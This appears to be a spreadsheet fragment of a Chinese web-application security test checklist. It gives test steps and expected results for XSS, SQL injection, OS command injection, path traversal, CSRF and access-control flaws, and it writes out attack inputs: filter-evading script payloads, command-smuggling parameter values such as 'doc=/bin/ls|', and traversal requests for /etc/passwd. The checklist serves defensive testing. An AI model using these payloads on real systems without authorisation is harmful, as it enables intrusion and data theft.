      当对引号字符前插入反斜线字符时。如 var a ='foo';可输入foo\';alert(1);来绕过。当反斜线字符被正确转义，但尖括号没有净化时，可使用&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;
      当脚本位于事件处理程序内时，可对引号进行HTML编码来避开对引号或其他字符的净化。如将foo值位于：&lt;a href="#" onclick="var a ='foo';.....且应用程序正确转义输入中的引号及反斜线，则可输入foo&amp;apos;;alert(1);//来实施攻击。这是利用某些浏览器在将事件处理程序作为 javascript执行前会执行HTML解码。&lt;a href="#" onclick="var a='foo&amp;apos;;alert(1);//';
   c.长度限制：（1）使用最短可能的攻击脚本（2）将攻击有效负载分布到不同的位置上（3）将一个反射型XSS漏洞转换成基于DOM的漏洞&lt;script&gt;eval(location.hash.slice(1))&lt;/script&gt;
白盒测试：
1.参考黑盒测试查找系统的所有输入、输出点。
2.找到相关的源码，进行过滤分析。（下面是优秀做法参考）
  针对具体功能限制参数的长度与字符白名单；
  输入数据先做归一化；
  确认空字节是否干扰校验逻辑。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>不存在存储型XSS漏洞</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.检查每一段客户端JAVASCIPT是否出现以下API,它们可用于访问通过一个专门设计的URL控制的DOM数据。
Document.location
document.URL
document.URLUnencoded
document.referrer
window.location
2.检查上述API的位置的代码，确定应用程序如何处理用户可控制的数据及如何执行任意javascript.输入数据是否被传送至以下任意API，如果有使用以下API，可能存在漏洞
document.write()
document.writeln()
document.body.innerHtml
eval()
window.execScript()
window.setInterval()
window.setTimeout()
3.当客户端脚本从URL提取参数值时，脚本如下：
&lt;script&gt;
document.write(window.location.search);
 &lt;/script&gt;
可构造攻击URL：http://localhost/test2541.php?&lt;script&gt;alert(123456)&lt;/script&gt;进行测试。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.进入应用系统
2.检查WEB系统与数据库交互的数据从客户提交时，是否完成了特殊字符的处理：包括一个单引号（ ' ）或一个分号（ ; ）检查系统返回数据库错误 。
3.查看后台数据库日志信息</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.观察参数的值value是否为数字型。如果是数字型进行数字型测试，否则跳到第4步进行字符型测试（例如如果出现a那说明是字符型，如果出现2则将其当做数字型测试）
2.将被测参数后加上测试语句“and 1=1”，即：地址栏中填入“http://www.exmaple.com/page.xxx?name=value and 1=1”, 如果返回正确页面则进行下一步操作，否则跳到第4步。
3.将被测参数后加上测试语句“and 1=2”（这里以第n个参数为例），其他参数保持不变，即：地址栏中填入“http://www.exmaple.com/page.xxx? name=value and 1=2”, 如果返回正确页面则进行下一步操作，否则该参数存在注入漏洞，完成测试
4.将被测参数后加上测试语句“’ and ‘1’=’1”，即：地址栏中填入“http://www.exmaple.com/page.xxx? name=value’ and ‘1’=’1”, 如果返回正确页面则进行下一步操作，否则该参数存在注入漏洞，完成测试
5.将被测参数后加上测试语句“’ and ‘1’=’2”，即：地址栏中填入“http://www.exmaple.com/page.xxx? name=value’ and ‘1’=’2”, 如果返回正确页面则不存在漏洞，否则该参数存在注入漏洞，完成测试</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.当在web应用程序中查看文件时，文件名通常在URL中显示出来。例：在改变之前的 URL：http://sensitive/cgi-bin/userData.pl?doc=user1.txt
2.修改URL为：http://sensitive/cgi-bin/userData.pl?doc=/bin/ls|
这将执行“/bin/ls” 命令。
注：Perl 允许进程输送数据到 open 命令中。用户能轻易地在文件名尾部附加输送字符“|”</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>无法返回系统信息到界面，或者操作系统中无相关的操作日志信息。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.进入系统，发送查看文件请求
2.使用WEB代理工具拦截请求消息，并在请求消息中增加OS命令。
如：POST消息中 Doc=Doc1.pdf，修改为：Doc=Doc1.pdf+|+Dir c:\或者Exec Results for 'cmd.exe /c type "C:\httpd\public\doc\"Doc=Doc1.pdf+|+Dir c:\'
根据操作系统不同构造相应的操作系统命令</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.启动burpsuit代理，配置对GET和POST方法进行拦截；
2.在浏览器上设置代理服务器为127.0.0.1，端口为8008；
3.对HTTP请求进行过滤和拦截，查找带有敏感的参数的请求如ls、dir、cmd、echo；
4.将参数修改为操作系统命令，如ls /etc/
5.如果返回etc目录下的文件信息，说明ls命令执行成功，因此存在漏洞；
6.如果未返回etc下的目录信息，继续第4步测试，将参数修改为echo 123456 &gt;&gt;/tmp/tmp.txt
7.查看服务器中是否存在tmp.txt文件，如果存在并且内容相同，说明存在漏洞。
备注：测试不同的操作系统使用不同的参数，同时关注比较“特殊”的URL，如:
   http://127.0.0.1/cmd.jsp
   http://127.0.0.1/system.jsp</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.使用COVERITY,FORTIFY等代码扫描工具进行代码扫描；
2.根据扫描结果分析代码中存在的缓冲区溢出问题，包括：堆溢出、栈溢出、格式化字符串（更新扫描规则）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.成功登录Web系统。
2.在业务要求的边界值范围外，使用超出业务边界限制的数据，发送到系统，如购物数量为-1，产品折扣等。
3.如果客户端进行了限制，使用WEB代理工具burpsuite拦截请求消息，修改相应的字段，并发送至服务器端。
测试思路：主要验证数值等边界超出范围后，是否影响系统的安全，具体的用例设计需要根据产品实际情况设计。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.登录Web系统；
2.逐个访问各功能菜单，查看URL或页面源文件（以hidden关键字，在源文件中查找隐藏域）是否包含用户标识、商品价格等不允许客户端修改的信息；
3.尝试通过burpsuite拦截并修改步骤2发现的不允许客户端修改的信息（比如：把用户标识改为其他用户，或者把商品价格改为低价格），然后提交给服务器；
4.查看后台数据库的相关数据，检查步骤3的篡改是否起成功。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.采用Appscan对Web应用进行扫描。
2.针对工具扫描存在漏报和误报，也可以使用手工测试方法:
   a.不存在的URL
   （1）我们请求不存在的文件，比如：
http://www.exmaple.com/unexist.jsp 或者 http://aa.bb.cc.dd/unexist.jsp
   （2）在浏览器地址栏中依次输入这些URL并回车
   （3） 观察返回结果
   b.非法字符
   （1） 在正常的URL的参数中添加特殊字符： %  *  ;  ’  ? ；添加特殊字符后的URL为:
http://www.exmaple.com/page.xxx?name= value%
   （2）在浏览器地址栏中依次输入这些带有特殊字符的URL并回车
   （3） 观察返回结果
   c.具有数据提交增删改查的地方，提交非法数据导致sql语句出错，查看页面回显是否会显示错误的提示信息。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.启动WSDigger工具
2.点击右下角的“Next”按钮
3.在WSDL输入框中输入接口的WSDL的URL地址（如：http://PortalIP:Port/Path/Interface?wsdl）
4.点击“Get Methods”按钮，获取接口方法
5.左侧将列出接口方法，点击需要测试的接口
6.在Input栏，检查是否存在用于认证的参数（如用户名、密码、token等），
7.若存在用于认证的参数，对各参数进行正确的赋值
8.点击“Invoke”按钮
9.查看“Output”栏中的返回信息，是否调用成功。
备注：1.对于WSDigger调用发生异常的接口，可通过文档分析Web Service接口调用是否有进行认证。
2.此操作也可以使用SOAPUI/restClient工具。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.启动codenomicon，并加载WEBAPP,XML+SOAP的LICENSE
2.在Basic configuration配置IP和端口号
3.在Interoperability中配置，选择sample-&gt;Sequence Editor
4.选中request-POST-127-0-0-0-1消息，点击Change message
5.在Change content file框里，结合产品实际，输入自己的SOAP消息，点击save时，会出现如下提示框，直接点击Ok
6.在Interoperability主页面，选择新建的custom00-sample,点击Test。如果显示web-application.valid,则前面基本配置正确
7.选择用例并执行</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Web Service不存在SQL注入或者Xpath注入、溢出等漏洞。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.运行AppScan，选择file—new新建扫描，选择扫描模板default
2.弹出扫描配置对话框，选择扫描类型，默认为Web Service Scan，点击next
3.在Starting URL中填入需扫描的目标服务器域名或IP地址，其他配置默认，点击next
4.选择No Login，点击next
5.不需修改任何参数，点击next
6.不需修改参数，选择Start a full automatic scan，点击finish开始扫描</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.启动WebScarab代理，配置对GET和POST方法进行拦截；
2.对HTTP请求进行过滤和拦截，如果发现类似http://127.0.0.1/ReturnUrl=http://www.xxx.com的请求；
3.将url参数替换为任意的URL地址，如http://127.0.0.1/ReturnUrl=http://www.huawei.com；
4.如果成功跳转到www.huawei.com域名，说明存在问题。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.打开文件上传页面；
2.在上传文件过程中，关闭本页面；
3.观察系统是否正常运行</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.密码/口令不能明文存储在系统(物理/内存数据库、配置文件、日志、脚本、jsp、jar包、zip包、注释、.cshrc隐藏文件等、页面、客户端)任何地方
2.密码/口令和密钥不能在同一文件
3.口令文件和解码工具在同一目录时，相关脚本和文件权限最小化：至少同他组用户权限为不可读写执行（建议加解密程序和口令文件至少一个700）
4.口令文件的访问权限需要受到控制，不可以被随意的用户去访问该口令文件
5.关于第3方安全：
a.开源如果不涉及GPL（产品修改代码后要上传代码），那么产品需要整改。
b.开源如果涉及GPL（产品修改代码后要上传代码），那么产品也没法整改，只需记录下问题。
c.关于OEM-IN的问题，这个安全TMG上半年史开林统一提交到采购部了，如果还发现问题也需要推动，可以和史开林联系。
4.对于升级版本的历史文件中有明文密码信息的，需要升级指导有步骤说明或升级脚本对密码进行加密或者清理不需要的明文密码。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>普通用户无法读取或拷贝口令文件和口令文件内容。
说明：根据业务需求，如果同组用户必须读取，也可以容许，至少保证其他用户无法读取；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>通过robots.txt文件不能获取敏感的目录或文件信息。
敏感目录举例：/employee/salary_files/
敏感文件举例：/sys_manager/setup.jsp</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.已知漏洞均已修改</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.目标系统运行正常，没有程序崩溃</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>无法利用该SID进行管理员操作。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.查找不需要认证即可访问的链接。
2.访问该链接如：http://[IP]:8080/gcli/U2000，查看相应消息，看是否有合法的SID（会话凭证），利用该SID进行一些管理员操作。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>存在不需要认证即可访问的链接，并且该链接原来是特定角色（如管理员）才有权限访问的。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>对于不允许在交互过程中修改的参数（比手机号、帐号、价格等），不在隐藏域或URL中携带。即使携带了，服务器端也不受理。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>返回结果失败，不能得到想要的数据。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.启用客户端或web浏览器，输入凭证连接到服务器。
2.通过抓包工具获取某个功能的数据报文。
3.点击注销按钮，然后重放第二步捕获的数据报文。如果是web应用，有很多相关的工具可以使用，如burpsuite、fiddle2等；如果是C/S架构，可以通过协议结构自己写发包脚本进行测试，也可以直接将抓到的数据报文通过python脚本重放来实现。
4.观察返回结果。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>不涉及</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1. Web业务运行正常
2. 已知某页面URL（假设为http://www.example.com/viewfile.do?filename=report.xls）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.更改参数的值为其他路径和文件。
2.在浏览器地址栏中尝试以下URL。
http://www.example.com/viewfile.do?filename=..\/etc\/passwd
http://www.example.com/viewfile.do?filename=..\etc\passwd
http://www.example.com/viewfile.do?filename=..\/..\/etc\/passwd
http://www.example.com/viewfile.do?filename=..\..\etc\passwd
http://www.example.com/viewfile.do?filename=..\/..\/..\/etc\/passwd
http://www.example.com/viewfile.do?filename=..\..\..\etc\passwd
http://www.example.com/viewfile.do?filename=..\/..\/..\/..\/etc\/passwd
http://www.example.com/viewfile.do?filename=..\..\..\..\etc\passwd
http://www.example.com/viewfile.do?filename=..\/..\/..\/..\/..\/etc\/passwd
http://www.example.com/viewfile.do?filename=..\..\..\..\..\etc\passwd
……
对于UNIX/Linux服务器可以尝试下载/etc/passwd；对于Windows服务器可以尝试下载c:\boot.ini文件。
3.观察页面返回信息，如果可以获取到passwd或boot.ini等敏感文件，则说明存在漏洞。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、 在输入的参数后逐条添加以下语句，以第一条为例，输入http://www.exmaple.com/page.xxx?name=&lt;script&gt;alert(123456)&lt;/script&gt;只要其中一条弹出显示123456的告警框，就说明存在跨站漏洞，记录漏洞，停止测试。
2、 如果没有弹出显示123456的告警框，则在返回的页面上单击鼠标右键，选择“查看源文件”。
3、 查找网页源文件中是否包含完整的字符串&lt;script&gt;alert(123456)&lt;/script&gt;，则不管有没有弹出显示123456的告警框，都表明存在跨站脚本漏洞。
4、 由于有些HTML元素（比如&lt;textarea&gt;或”）会影响脚本的执行，所以不一定能够正确弹出123456告警框，需要根据返回网页源文件的内容，构造value的值，比如
&lt;/textarea&gt;&lt;script&gt;alert(123456)&lt;/script&gt;
'&gt;&lt;script&gt;alert(123456)&lt;/script&gt;
"&gt;&lt;script&gt;alert(123456)&lt;/script&gt;
&lt;/title&gt;&lt;script&gt;alert(123456)&lt;/script&gt;
--&gt;&lt;script&gt;alert(123456)&lt;/script&gt;
[img]javascript:alert(123456)[/img]
&lt;scrip&lt;script&gt;t&gt;alert(123456)&lt;/scrip&lt;/script&gt;t&gt;
&lt;/div&gt;&lt;Script&gt;alert(123456)&lt;/script&gt;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、 在POST表单中逐条输入以下语句，只要其中一条弹出显示123456的对话框，就说明存在跨站漏洞，记录漏洞，停止测试。
2、 如果没有弹出显示123456的告警框，则在返回的页面上单击鼠标右键，选择“查看源文件”。
3、 查找网页源文件中是否包含完整的字符串&lt;script&gt;alert(123456)&lt;/script&gt;，则不管有没有弹出显示123456的告警框，都表明存在跨站脚本漏洞。
4、 由于有些HTML元素（比如&lt;textarea&gt;或”）会影响脚本的执行，所以不一定能够正确弹出123456告警框，需要根据返回网页源文件的内容，构造value的值，比如
&lt;/textarea&gt;&lt;script&gt;alert(123456)&lt;/script&gt;
'&gt;&lt;script&gt;alert(123456)&lt;/script&gt;
"&gt;&lt;script&gt;alert(123456)&lt;/script&gt;
&lt;/title&gt;&lt;script&gt;alert(123456)&lt;/script&gt;
--&gt;&lt;script&gt;alert(123456)&lt;/script&gt;
[img]javascript:alert(123456)[/img]
&lt;scrip&lt;script&gt;t&gt;alert(123456)&lt;/scrip&lt;/script&gt;t&gt;
&lt;/div&gt;&lt;Script&gt;alert(123456)&lt;/script&gt;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.对于B/S应用，访问系统的一些重要操作，比如修改余额、添加用户等，按要求输入相应的数据，并提交；
2.通过WebScarab拦截请求，查看整个交互过程中（有可能一个操作涉及多个步骤）客户端提交参数是否包含token、referer、动态口令以及验证码等信息；
3.如果不存在任何验证信息，说明存在问题；
4.删除token、referer、验证码等验证信息并提交，如果请求成功，说明存在问题。
备注：
1.可以通过AppScan扫描来完成检测，当使用referer解决CSRF问题时存在一定的局限性，在特别重要的功能模块中建议不使用此方法；
2.不重要的功能模块中出现CSRF漏洞，经人为评估后不会造成严重影响为可以忽略此漏洞。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.检查系统中是否存在Web应用，如果存在继续下边测试；
2.在Web根目录通过命令查找数据库如：
  find ./ -name *.mdb 
  find ./ -name *.db
3.数据库文件扩展名可以任意修改，因此有必要和产品人员沟通或者从源码中查找数据库文件；
4.检查数据库文件是否可以通过Web方式直接下载，如果可以说明存在问题。
补齐WEB路径下载方法：http://www.demo.com/xxxx/xxxx.db</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.识别两目标通信组件之间通信的属性和机制，寻找攻击的机会。
2.将攻击者插入两目标通信组件之间作为路由代理。
3.观察、过滤、修改两目标组件之间的通信数据，看能否获取敏感信息或操纵目标组件的动作。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1. 我们请求不存在的文件，比如：http://www.example.com/unexist.jsp或者http://aa.bb.cc.dd/unexist.jsp。
2. 观察返回结果。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.利用HTTP代理工具截获客户端发往服务器端的HTTP请求；
2.篡改请求，在正常参数后面插入%0d%0aFoo:+bar之类的字符，将篡改之后的请求发往服务器；
3.通过代理工具查看HTTP响应内容；
4.HTTP消息头中，由用户输入控制的每个位置都要进行上述检查。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.以管理员或高级用户身份登录系统。
2.启动WebScarab/burpsuite等代理工具，对客户端与服务器的通讯进行拦截监控。
3.访问具有权限控制的资源，通过代理工具观察请求控制报文中是否存在关键参数（如：privilege.privilegecode.userid.id.level.levelid等），以及这些参数的赋值情况，并予以记录。
4.以低级别用户登录系统。
5.使用低级别用户身份尝试访问受控资源，通过代理工具观察请求及响应报文中关键参数的赋值情况，分析其中规律。
6.再次使用低级别用户身份访问受控资源，通过代理工具拦截请求报文，根据之前分析猜测情况，手动修改关键参数数值，修改完毕后从新发送修改后的报文，观察受控资源可否被访问。
7.重复第6步，尝试对更多的受控资源，检查越权访问的可能性。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.HTTP响应中不存在新行或注入的换行符。应用程序不存在HTTTP Splitting漏洞。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Web系统不存在Cookie注入漏洞。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.使用AppScan扫描；
2.人工分析扫描结果，检查代码注释是是否包含敏感信息如IP、SQL语句、物理路径等。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>failed</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.使用管理员访问日志内容，并管理日志
2.使用普通没有权限访问日志内容，并管理日志</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.管理员可以正常访问日志和管理日志
2.普通用户不可以访问日志和管理日志</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>如datapush的log文件权限other可以读取</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.系统首次运行使用时或在资料中，应提示客户更改初始密码、密钥等预验证属性信息，提示风险</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.检查操作系统用户是否能够独立、随时的修改自身口令</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.登陆被测系统，进入命令行模式
2.执行cat /etc/rsyslog.conf |grep /var；筛选出配置的日志文件
3.逐一检查日志文件的属主和文件权限</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.登陆Web后台服务器
2.用ll命令查看目录和文件的权限信息
3.检查目录和文件权限是否最小化</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.登录Web后台服务器
2.查看Web容器日志存储是否为单独分配磁盘空间</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>业界标准 OWASP</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>测试环境暂不实施</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Web内容目录（可访问目录）下不存在敏感文件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.查找多个不同目录的URL，如：
    http://www.exmaple.com/data/info.jsp
    http://www.exmaple.com/config/config.jsp
2.通过URL直接访问对应的文件夹，如：
    http://www.exmaple.com/data
    http://www.exmaple.com/config/
3.观察浏览器是否可以列出data或config目录下的文件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.登录Web后台服务器；
2.进入Web部署目录，检查目录中，是否保留调试用的代码或文件。
find ./ -name "*test*"
find ./ -name "*Test*"
注：根据产品习惯定制。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.登录Web后台服务器；
2.进入Web部署目录，检查目录中，是否含有管理相关代码或文件。
find ./ -name "*admin*"
find ./ -name "*manage*"
3.使用浏览器并在地址栏构造相应的链接查看相关页面，比如http://www.exmaple.com/admin/admin.html
4.如果步骤3页面可以访问，查看产品文档是否有该页面的说明
注：根据产品习惯定制。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.使用AppScan工具检查
   a.使用AppScan扫描；
   b.如果提示存在不安全的http方法，说明存在问题
2.手工构造HTTP报文测试
   a.点击“开始”－“运行”，输入cmd并回车，运行cmd.exe
   b.输入telnet IP 端口 （其中IP和端口按实际情况填写，用空格隔开，比如：telnet 10.70.100.171 8080）
   c.回车
   d.在新行中输入如下一行，并回车
    OPTIONS / HTTP/1.0
   e.检查返回结果中的Allow的方法不包含不安全的方法
   返回结果样例：
   HTTP/1.1 200 OK
   Server: Apache-Coyote/1.1
   X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0    date=200610162339)/Tomcat-5.5
   Allow: GET, HEAD, POST, PUT, DELETE, TRACE, OPTIONS
   Content-Length: 0
   Date: Mon, 29 Jun 2009 08:02:47 GMT
   Connection: close
备注：
    手工测试仅以构造OPTIONS方法为例，如果OPTIONS方法被服务器禁止，请手工构造DELETE、PUT、TRACE、MOVE、COPY等不安全方法报文</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>已知漏洞</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>此用例仅针对"多次登录失败后，才提供验证码"场景 其他</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.系统无法正常登录；
2.旧认证表单（或旧认证请求）失效</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统无法正常登录</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Domain属性设置在本域内</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.临时会话不需要设置过期时间
2.永久性Cookie根据业务需要设置相应的时长，避免过期时间太长，导致安全风险。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Path属性设置在Web应用目录内</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>会话标识在登录前后不同</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>会话信息使用HTTPS传输</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>HTTP响应消息中应使用"Expires:0"和"Cache-Control: max-age=0"指令</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>服务器端不接受转换后的GET消息，返回错误消息。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>无法正常请求该功能</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>用户B无法访问用户A能访问的资源。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>服务器返回操作失败或者以userA的用户身份操作。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>返回结果无法查询超出范围的业务请求信息</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>修改字段后无法提升权限，如可以提升权限则验证不通过</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>对于每一个需要授权访问的页面或servlet的请求都必须做权限控制；
对于未作权限控制的公共URL有充足的理由（比如空白页面、图片无意义无风险）
用户不能越权访问未经授权的web页面或servlet。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>对基于action、dwr等其他形式的请求必须做权限控制；（除一些空白页面、图片无意义无风险等公共URL外）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>不存在XSS漏洞</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>无法通过构造的注入绕过认证，及查询出系统中更多的数据信息。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>有输入校验，不能执行OS命令，无法显示目录信息到页面。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.页面的源代码中不包含类似于系统命令的返回信息。
2.服务器中不存在相关文件。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>无相关溢出内容。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>数据的边界值在服务器端校验，异常数据无法导致问题。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>服务器对输入参数做校验，篡改不起作用；前台提示输入参数错误</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>无法绕过系统的操作步骤限制，进行业务处理。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>无法绕过系统状态迁移逻辑。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>无法绕过客户端业务逻辑限制</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>服务器端对上传文件的类型、保存的路径及文件名进行严格限制，无法上传后门程序。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>上传文件时应该在客户端和服务器端同时判断文件类型</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>服务器端对上传文件的大小进行严格限制，无法上传过大的文件。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>使用HTTPS传输个人敏感信息</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.截获的数据中，无机密数据
2.避免密文与密钥一起传输、传输口令的SHA256摘要(数据库中存储的也是SHA256摘要)等等实际不能达到防止黑客攻击(重放攻击)效果的设计</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.检查产品设计文档或资料，梳理产品所有涉及非信任网络的B/S、C/S应用、接口(ftp/webservice等)，检查是否涉及敏感数据的传输
2.使用嗅探工具进行嗅探；查看嗅探记录，根据传输的源IP及目的IP过滤出相应的记录，右键并点击“Follow TCP Stream”，检查是否能够看到明文的敏感数据。
3.如果嗅探记录中为密文敏感数据，是否存在：密文与密钥一起传输、传输口令的SHA256摘要(数据库中存储的也是SHA256摘要)等不和规的场景
注：
   a.典型的敏感数据包括：口令、银行帐号、大批量个人数据、用户通信内容、密钥、用于认证的证书、License、用于网络通信协议协商的身份认证Key等
   b.典型的信任网络举例：防火墙的同一trust区中的同一信任域/DMZ区中同一信任域的主机通信，专属VPN网络
   c.典型非信任网络举例：该网络内的设备和用户行为不可控或存在较大安全风险的网络，如Internet、intranet、与第三方SP/CP的接口、防火墙中不同信任域之间主机通信（不同trust之间或者trust与DMZ之间主机通信）等，其他场景请根据实际防火墙策略判断
   d.windows嗅探工具使用Wireshark，Suse/AIX/HP-UX使用tcpdump， solaris使用snoop</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>web监控不涉及具体文件内容</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>对于Web应用，登录过程中，往服务器端传递用户名和口令时，采用HTTPS安全协议（也就是带服务器端证书的SSL）。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>pass</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>不能够得到Web服务器准确的版本信息</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统不存在高危漏洞</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.运行Httprint_gui.exe
2.在Host列中输入主机域名（如果没有域名则输入IP地址），在端口列中输入端口号。如果为HTTPS则要选择锁图标下面的选择框。
3.点击程序下方的运行按钮
4.观察程序输出的结果</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Error Parsing response data</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>所有接口方法均不能返回正确的结果。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>无crossdomain.xml使用或者crossdomain.xml中的域请求遵循最小化按需配置原则</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>无法任意跳转URL指定的信息</t>
